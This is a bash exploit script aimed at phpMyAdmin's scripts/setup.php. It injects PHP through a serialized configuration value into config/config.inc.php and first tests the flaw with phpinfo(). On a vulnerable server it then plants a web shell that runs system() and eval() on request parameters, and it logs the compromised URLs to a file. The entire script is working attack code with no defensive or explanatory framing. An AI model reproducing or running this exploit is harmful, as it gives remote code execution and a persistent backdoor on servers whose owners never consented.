#!/bin/bash

BLK='[1;30m'
DRED='[0;31m'
DGRN='[0;32m'
DBLU='[0;34m'
DWHI='[0;37m'
BLU='[1;34m'
RES='[0m'

if [ -f "/bin/curl" ]; then
    curl=/bin/curl
    else
    if [ -f "/usr/bin/curl" ]; then
	curl=/usr/bin/curl
	else
	if [ -f "/usr/local/bin/curl" ]; then
	    curl=/usr/local/bin/curl
	    else
	    curl=./curl
	fi
    fi
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

	flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
	$curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
	if $curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
	then
		$curl -ks --url "$3/config/config.inc.php" >$flag	
		$curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
		echo "${DBLU}  --> *Server: ${BLK}[${DGRN}$3${BLK}] ${DBLU}is: ${DRED}VULNERABLE${RES}"
		echo "$3/config/config.inc.php" >>log 2>/dev/null
	else
		echo "${DBLU}  --> *Server: ${BLK}[${DGRN}$3${BLK}] ${DBLU}is: ${DGRN}NOT VULNERABLE${RES}"
		exit
	fi
}

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`

if grep phpMyAdmin $cookiejar &>/dev/null
then
	length=`echo -n $token | wc -c`

	if [[ $length -eq 32 ]]
	then
		exploit $token $cookiejar $1
	else
	    echo "${DBLU}  --> *Server: ${BLK}[${DGRN}$1${BLK}] ${DBLU}is: ${DGRN}NOT VULNERABLE${RES}"
		exit
	fi
else
	echo "${DBLU}  --> *Server: ${BLK}[${DGRN}$1${BLK}] ${DBLU}is: ${DGRN}NOT VULNERABLE${RES}"
	exit
fi
